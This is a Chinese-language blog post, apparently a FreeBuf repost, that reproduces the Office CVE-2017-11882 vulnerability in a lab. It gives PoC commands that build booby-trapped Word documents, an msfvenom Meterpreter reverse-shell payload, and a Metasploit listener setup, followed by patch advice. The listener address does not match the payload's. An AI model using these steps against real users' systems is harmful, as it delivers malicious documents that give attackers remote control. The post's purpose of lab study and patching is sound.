CVE 2017-11882 office缓存溢出漏洞 – 作者:minggege

1.漏洞概述

针对这个漏洞,微软在2017年11月14号,推送了常规的安全更新,其中,关于CVE-2017-11882的安全更新引起了圈里的关注,随之而来的,便是针对此漏洞的POC攻击代码被逐渐公开。
这里是poc地址

https://github.com/unamer/CVE-2017-11882

2.影响版本

office 2003
office 2007
office 2010
office 2013
office 2016

3.复现环境

渗透机:kali + POC代码【上述github地址】
靶机:Win7 + Office 2016

4.复现步骤

4.1 下载Office 2016 和POC

Office2016 下载地址:http://www.downcc.com/soft/290076.html

4.2 使用下载的POC进行测试

python CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o calc.doc
python CVE-2017-11882.py -c "cmd.exe /c taskmgr.exe" -o tasklist.doc

1602846225_5f897e11296b32344d7b5.png!small

1602846239_5f897e1fbef915dee97fb.png!small

1602846252_5f897e2cc53105abe8f28.png!small

4.3 生成带有shell的后门word文件,并开启监听

生成shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.236.130 LPORT=4444 -o ./sc.bin

生成doc

python CVE-2017-11882.py -c bro.bin -t 0 -i 1 -o bro.doc

1602846317_5f897e6d8b224e16ae47b.png!small

使用kali的msf实现监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost  192.168.236.130

1602846357_5f897e95cd1870be2f30c.png!small?1602846352661

4.4 运行bro.doc

1602846377_5f897ea9e25aff41e1f8c.png!small?1602846372575

1602846397_5f897ebd6322945205972.png!small?1602846392112

1602846408_5f897ec882065966c1881.png!small?1602846403215

5.漏洞修复

1.保持系统更新,做到重要补丁及时更新。
2.打补丁。此漏洞对应的微软补丁地址:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882

来源:freebuf.com 2020-10-16 19:08:04 by: minggege

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论